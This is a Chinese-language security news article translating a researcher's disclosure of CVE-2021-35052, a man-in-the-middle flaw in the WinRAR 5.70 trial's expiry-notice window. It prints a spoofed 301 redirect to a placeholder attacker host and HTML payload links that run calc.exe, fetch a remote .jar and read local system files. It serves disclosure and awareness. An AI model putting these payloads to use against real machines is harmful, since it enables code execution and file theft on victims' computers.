WinRAR 试用版曝漏洞:免费软件并不“免费“
聚焦源代码安全,网罗国内外最新资讯!
作者:Igor Sak-Sakovskiy
编译:代码卫士团队
本文讨论的是位于 WinRAR 试用版中的一个漏洞,它对管理第三方软件具有重大影响。该漏洞可导致攻击者拦截并修改发送到该试用版用户的请求,从而在用户计算机实现远程代码执行。该漏洞的编号为 CVE-2021-35052。
背景
WinRAR 是一款用于管理 Windows 操作系统上文档文件的应用程序,可创建并解压缩常见文档格式如 RAR 和 ZIP。WinRAR 以试用软件的形式分发,可使用户在规定期限内试用全部功能,期限过后用户可能还可以使用该应用,不过某些特性会被禁用。
研究结果
研究人员指出,这个漏洞是偶然从 WinRAR 版本 5.70 中发现的。他们安装并使用一段时间后,WinRAR 生成一个 JavaScript错误:
这一结果让人惊讶,因为该错误表明 IE 引擎正在渲染该错误窗口。经过几次实验后,研究人员发现一旦试用期结束,则大概在每三次启动 WinRAR.exe 应用中,有一次就会出现这个通知窗口。该窗口使用的是 Borland C++ 的 mshtml.dll 实现,这也是编写 WinRAR 的语言。
研究员将本地 Burp Suite 作为默认的 Windows 代理并尝试拦截流量以及了解错误发生的原因以及是否利用该错误。由于请求是通过 HTTPS 发送的,因此 WinRAR 用户将收到关于Burp所使用的自签名证书不正确的通知。然而,很多用户会点击 “Yes” 继续使用该应用。
从请求本身可看到WinRAR 应用程序的版本 (5.7.0) 和架构 (x64):
GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com
Connection: close
Cookie: _wr=; _gid=; _ga=
修改对终端用户的请求
接着,研究员尝试修改 WinRAR 向用户发送的响应。研究人员并非每次都会使用恶意内容拦截并更改默认域名 “notifier.rarlab.com” 的响应,而是注意到如果响应代码被更改为 “301 永久移除“,之后重定向恶意域名 “attacker.com” 会被缓存,而所有请求将会去往 “attacker.com”。
HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close
远程代码执行
这种中间人攻击要求进行 ARP 欺骗,因此假定潜在攻击者已经能够访问该网络域名,则会将研究员置于 IE 安全区域的 Zone 1。研究人员通过多种不同的攻击向量查看是否适用于这种访问权限。
<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\\10.0.12.34/applications/test.jar">\\10.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\\windows\\system.ini">file:///C:\\windows\\system.ini</a><br>
如上代码说明了展现多种可能的攻击向量的被欺骗响应,这些向量包括运行应用程序、检索本地主机信息以及运行计算器应用程序。
多数攻击向量是成功的,但应当注意到很多攻击向量会触发额外的 Windows 安全警告信息。要达到全面成功,需要用户点击“运行“而非”取消‘。
然而,运行某些文件类型时并不会出现安全警告信息,包括:.DOCX、.PDF、.PY 和 .RAR。
在 WinRAR 5.7 之前的版本中,利用漏洞 CVE-2018-20250 还可以实现远程代码执行后果。
结论
组织机构面临的最大挑战之一是管理第三方软件。一旦安装后第三方软件就能够读、写和修改设备上的数据,而这些设备能够访问企业网络。用户不可能审计每个应用程序是否可安装,因此制定相关策略对于管理外部应用程序相关风险以及平衡多种应用程序的业务需求和风险就显得十分重要。管理不当可造成影响广泛的后果。
推荐阅读
WinRAR 被曝已存在19年的RCE 漏洞,影响全球5亿用户
勒索软件CTB-Faker使用WinRAR将数据锁定为带有密码保护的ZIP文件
第三方攻击在增长但风险管理跟不上
原文链接
https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/
题图:Pixabay License
本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。
奇安信代码卫士 (codesafe)
国内首个专注于软件开发安全的产品线。
觉得不错,就点个 “在看” 或 "赞” 吧~
WinRAR 试用版曝漏洞:免费软件并不“免费“相关推荐
- 别找OA试用版了,直接送你一个永久免费的
创业初期的企业或小微企业需要信息化管理.协同办公,都会倾向于寻找试用版.破解版的免费软件,但这些软件缺失了企业管理软件最重要的环节:软件维护更新与服务,所以即使是免费软件,各企业在选择的时候也要慎重考 ...
- 别找ERP试用版了,直接送你一个免费的
要方便而且实用,必须要适合企业管理个性化.怎样才能做到这样的个性化呢?别找二批使用版了,直接送你一个免费的! 现在管理软件的确很多,不同行业有不同的软件,同一企业不同的业务领域或者部门有不同的软件.同 ...
- [海蜘蛛] 海蜘蛛 V8 全线无限试用版 免费发布破解教程
http://bbs.p52.cn/forum.php?mod=viewthread&tid=3499&extra=page%3D1&page=1&_dsign=79c ...
- 瑞星08试用版到期了,下面装个什么杀毒软件比较好呢?
瑞星08试用版到期了,下面装个什么杀毒软件比较好呢?Vision1153270830我来满意金山,.duba免费37天.江民,,基本不用杀毒软件的,只是个摆饰而已喔接下来的一系列配置... 一.瑞 ...
- 可以下载Microsoft ISA Server 2006 试用版了,网管需要关注
下载试用版地址:http://www.microsoft.com/china/isaserver/2006/beta.mspx 2006 FAQ: http://www.microsoft.com/c ...
- DotNetTextBoxV3.0在线编辑器控件Ver3.4.1 Open Source开源版(附商业试用版下载)
英文名:DotNetTextBox V3.0 WYSWYG Web Control For Asp.Net2.0/3.5 Open Source 中文名:DotNetTextBox V3.0 所见即所 ...
- 余承东吐槽苹果续航;微软 IE 浏览器被曝漏洞;React Native 0.61.0 发布 | 极客头条...
快来收听极客头条音频版吧,智能播报由标贝科技提供技术支持. 「CSDN 极客头条」,是从 CSDN 网站延伸至官方微信公众号的特别栏目,专注于一天业界事报道.风里雨里,我们将每天为朋友们,播报最新鲜有 ...
- WinRAR突现骇人漏洞,官方:没必要修复
WinRAR上周被曝出一个高危安全漏洞,恶意攻击者可以在SFX自解压模块中嵌入特定的HTML代码,从而在用户打开时执行任意代码. Vulnerability Lab和Malwarebytes将此漏洞的 ...
- 会声会影试用版到期了怎么办_会声会影2018试用版如何正确安装、卸载?
您在使用会声会影过程中,可能会遇到一些问题如:免费30天的试用期过期了.电脑安装其他软件与会声会影有冲突需要重新安装.程序自身错误需要重新安装.安装不是在系统盘,等等这一系列的问题(下面我们以会声会影 ...
最新文章
- [NOIP1998] 提高组 洛谷P1011 车站
- 再见!妈妈再也不用担心我的计算机基础!
- SAP Hybris Commerce的页面路由实现
- 为了涨薪,我给面试公司看我拿到的offer
- vi保存退出:x与:wq的区别
- c语言智能指针是什么,C++ 智能指针深入解析
- TensorFlow 中 tf.app.flags.FLAGS 的用法介绍
- 微信小程序wx.request请求服务器json数据并渲染到页面
- 疯狂连连看之开发界面布局
- linux下dns视图配置
- length()函数_奇怪的Haskell实验——length的实现是?
- 迈高图手机版_迈高图地图下载
- 数学最重要 :一个经济博士的总结(常春藤)Ph.D
- Mac 锁屏防止断网、睡眠、注销登录
- 安卓开发调用python脚本_android开发调用python脚本
- 数学建模之层次分析法(含MATLAB代码)
- 获取英雄联盟全皮肤(极速版)
- Hadoop相关概念
- RS码的噪声误码率图matlab,QPSK系统的误码率和星座图MATLAB仿真
- JS-移除class